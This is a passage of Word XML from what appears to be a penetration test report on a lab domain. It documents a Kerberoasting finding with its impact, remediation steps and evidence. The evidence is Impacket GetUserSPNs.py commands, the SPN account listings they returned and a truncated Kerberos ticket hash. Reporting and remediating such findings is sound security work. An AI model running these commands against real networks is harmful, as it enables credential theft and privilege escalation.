          </w:tcPr>
          <w:p w14:paraId="14996154" w14:textId="6B3AE92C" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00AB2409" w:rsidP="00B7507B">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 xml:space="preserve">A successful Kerberoasting attack along with cracked passwords could lead to lateral movement and privilege escalation in an AD environment. If a password is cracked for a Domain </w:t>
            </w:r>
            <w:r w:rsidR="00DF5B46" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrator </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">account or equivalent, an attacker could gain control over most, if not all, resources in the domain. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00216BB8" w:rsidRPr="00B96066" w14:paraId="650549CE"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7DC3BE9D" w14:textId="4E2178B9" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="000E6FF6">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="40" w:name="_Hlk100245366"/>
            <w:bookmarkEnd w:id="39"/>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="000E6FF6" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59747DA7" w14:textId="095441A2" w:rsidR="00216BB8" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="000E6FF6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="40"/>
      <w:tr w:rsidR="00CC3B1E" w:rsidRPr="00B96066" w14:paraId="5E128469"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DADD2DA" w14:textId="51473249" w:rsidR="00CC3B1E" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E3B93C" w14:textId="77777777" w:rsidR="00CC3B1E" w:rsidRPr="007D1F5C" w:rsidRDefault="00AB2409" w:rsidP="00B7507B">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Where possible eliminate SPNs in the environment in favor of Group Managed Service Accounts (gMSA) which are not subject to this type of attack. If migration to gMSAs is not possible the following steps will help mitigate the risk of this attack:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3F10FA" w14:textId="77777777" w:rsidR="00AB2409" w:rsidRPr="007D1F5C" w:rsidRDefault="00DF5B46" w:rsidP="00AB2409">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:num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Enable AES Kerberos encryption instead of RC4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C5E9CE" w14:textId="77777777" w:rsidR="00DF5B46" w:rsidRPr="007D1F5C" w:rsidRDefault="00DF5B46" w:rsidP="00AB2409">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:num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Use strong 25+ character passwords for service accounts and rotate them periodically</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407EDDDF" w14:textId="4569314D" w:rsidR="00DF5B46" w:rsidRPr="007D1F5C" w:rsidRDefault="00DF5B46" w:rsidP="00AB2409">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:num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 xml:space="preserve">Limit the privileges of service accounts and avoid creating SPNs tied to highly privileged accounts such as Domain Administrators </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC3B1E" w:rsidRPr="00B96066" w14:paraId="76076E41"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3F62C8FE" w14:textId="27A75A28" w:rsidR="00CC3B1E" w:rsidRPr="007D1F5C" w:rsidRDefault="00CC3B1E" w:rsidP="00B7507B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>External References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC5958F" w14:textId="168CD3B5" w:rsidR="00CC3B1E" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00B7507B">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4" w:history="1">
              <w:r w:rsidR="00AB2409" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1558/003/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00AB2409" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="38"/>
    <w:p w14:paraId="16ED5162" w14:textId="70C102ED" w:rsidR="00216BB8" w:rsidRDefault="00216BB8" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9EFE57" w14:textId="5BD84A7D" w:rsidR="006E291D" w:rsidRDefault="00C32C65" w:rsidP="00216BB8">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Retrieving a l</w:t>
      </w:r>
      <w:r w:rsidR="006E291D">
        <w:t>isting all SPN accounts in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C32C65">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> domain using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GetUserSPNs.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C64082">
        <w:t xml:space="preserve"> tool f</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00C64082">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>m the Impacket toolkit.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E291D" w14:paraId="04AE423B" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34EACE71" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>GetUserSPNs.py INLANEFREIGHT.LOCAL/bsmith -dc-ip 192.168.195.204</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFE8D95" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="768A605F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35A01526" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5958175D" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ServicePrincipalName                         Name       MemberOf  PasswordLastSet             LastLogon  Delegation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23852C58" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>-------------------------------------------  ---------  --------  --------------------------  ---------  ----------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4702F27A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL01.inlanefreight.local:1433      mssqlsvc             2022-05-13 16:52:07.280623  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571D093C" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL02.inlanefreight.local:1433      sqlprod              2022-05-13 16:54:52.889815  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF8379D" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL-DEV01.inlanefreight.local:1433  sqldev               2022-05-13 16:54:57.905315  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407A3C54" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/QA001.inlanefreight.local:1433      sqlqa                2022-05-13 16:55:03.421004  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C69487F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">backupjob/veam001.inlanefreight.local        backupjob            2022-05-13 18:38:17.740269  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D78219B" w14:textId="7DE0A526" w:rsidR="006E291D" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>vmware/vc.inlanefreight.local                vmwaresvc            2022-05-13 18:39:10.691799  &lt;never</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C2F7BEB" w14:textId="1A5480E1" w:rsidR="006E291D" w:rsidRDefault="00C32C65" w:rsidP="00C32C65">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Kerberoasting - Listing SPN Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16806830" w14:textId="1414020A" w:rsidR="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5729AB0A" w14:textId="13AE7E72" w:rsidR="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Targeted Kerberoasting</w:t>
      </w:r>
      <w:r w:rsidR="00C32C65">
        <w:t xml:space="preserve"> against the </w:t>
      </w:r>
      <w:r w:rsidR="00C32C65" w:rsidRPr="00C32C65">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>mssqlsvc</w:t>
      </w:r>
      <w:r w:rsidR="00C32C65">
        <w:t xml:space="preserve"> account using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00C32C65" w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GetUserSPNs.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C32C65">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r w:rsidR="00C64082">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E291D" w14:paraId="28CC73AC" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749381E9" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>GetUserSPNs.py INLANEFREIGHT.LOCAL/bsmith -dc-ip 192.168.195.204 -request-user mssqlsvc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59EBBB55" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="437E971A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A779782" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08FC58FB" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53EE473C" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ServicePrincipalName                     Name      MemberOf  PasswordLastSet             LastLogon  Delegation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="772FAF85" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>---------------------------------------  --------  --------  --------------------------  ---------  ----------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6D82A4" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL01.inlanefreight.local:1433  mssqlsvc            2022-05-13 16:52:07.280623  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3339BB33" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48CF637A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="003D5536" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3743381D" w14:textId="2E2CA51B" w:rsidR="006E291D" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>krb5tgs$23$*mssqlsvc$INLANEFREIGHT.LOCAL$INLANEFREIGHT.LOCAL/mssqlsvc*$2c43cf68f965432014279555d1984740$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 &lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C72C3BC" w14:textId="300E7CB9" w:rsidR="00C32C65" w:rsidRDefault="00C32C65">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Targeted Kerberoasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF05936" w14:textId="04F13780" w:rsidR="00704565" w:rsidRPr="00BC2D06" w:rsidRDefault="00216BB8" w:rsidP="00BC2D06">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC2D06">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="270883B0" w14:textId="37C6D71B" w:rsidR="003260D5" w:rsidRPr="00520B63" w:rsidRDefault="00DC5A70" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Local Administrator Password Re-Use </w:t>
      </w:r>
      <w:r w:rsidR="003260D5" w:rsidRPr="006372B6">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="003260D5" w:rsidRPr="006372B6">
        <w:rPr>
          <w:color w:val="FF3E3E"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="5EFC5759"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0CB0C7B7" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
